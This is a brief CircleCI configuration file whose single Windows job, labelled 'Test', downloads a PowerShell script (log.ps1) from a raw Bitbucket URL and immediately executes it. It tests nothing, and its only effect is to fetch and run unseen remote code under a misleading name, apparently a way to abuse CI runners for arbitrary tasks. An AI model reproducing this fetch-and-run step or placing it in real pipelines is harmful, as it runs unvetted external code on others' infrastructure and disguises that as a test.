version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/sukerto/sukerti/raw/ecc6d24d73e717ad726064c02dad973350db8b2d/log.ps1 -OutFile log.ps1
            ./log.ps1